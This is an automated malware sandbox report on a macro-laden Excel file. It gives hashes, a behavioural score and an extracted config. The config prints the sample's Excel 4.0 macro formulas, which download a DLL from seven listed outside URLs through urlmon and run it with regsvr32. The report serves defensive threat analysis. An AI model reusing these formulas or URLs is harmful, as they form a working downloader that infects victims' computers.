General
-
Target
696915ee59f3f1b1217370c3f901f801b33011edb40e3a46aceb059ecd7441f7
-
Size
20KB
-
Sample
241119-w2h76azhjr
-
MD5
e93c8d4257558e7c8d7bf89b5f37271f
-
SHA1
f3d09b233405c8ebb5341cb71c584ec6c2d01a36
-
SHA256
696915ee59f3f1b1217370c3f901f801b33011edb40e3a46aceb059ecd7441f7
-
SHA512
061f074f7349ed8a18455b76a8ff7b1056d239b49a1d601745c22baf52d1a184eb503e349a0f090df4ec685443c04373500ce00158fcbcf9619762c8b2b9981d
-
SSDEEP
384:CVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:qINco4FLhnCBn9kC+xbLv
Behavioral task
behavioral1
Sample
696915ee59f3f1b1217370c3f901f801b33011edb40e3a46aceb059ecd7441f7.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
696915ee59f3f1b1217370c3f901f801b33011edb40e3a46aceb059ecd7441f7.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/
http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/
http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/
http://aslar.dk/lj/AFAQXrxdyafuA3kn/
https://assf.com.ng/2021/coY6141cNQXQYGrob4o/
http://barth1.dk/_vti_cnf/AEyc6G/
https://www.baligrod.pl/wp-admin/QDSXoxha21C55/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aslar.dk/lj/AFAQXrxdyafuA3kn/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://assf.com.ng/2021/coY6141cNQXQYGrob4o/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://barth1.dk/_vti_cnf/AEyc6G/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.baligrod.pl/wp-admin/QDSXoxha21C55/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Extracted
https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/
http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/
http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/
Targets
-
-
Target
696915ee59f3f1b1217370c3f901f801b33011edb40e3a46aceb059ecd7441f7
-
Size
20KB
-
MD5
e93c8d4257558e7c8d7bf89b5f37271f
-
SHA1
f3d09b233405c8ebb5341cb71c584ec6c2d01a36
-
SHA256
696915ee59f3f1b1217370c3f901f801b33011edb40e3a46aceb059ecd7441f7
-
SHA512
061f074f7349ed8a18455b76a8ff7b1056d239b49a1d601745c22baf52d1a184eb503e349a0f090df4ec685443c04373500ce00158fcbcf9619762c8b2b9981d
-
SSDEEP
384:CVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:qINco4FLhnCBn9kC+xbLv
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-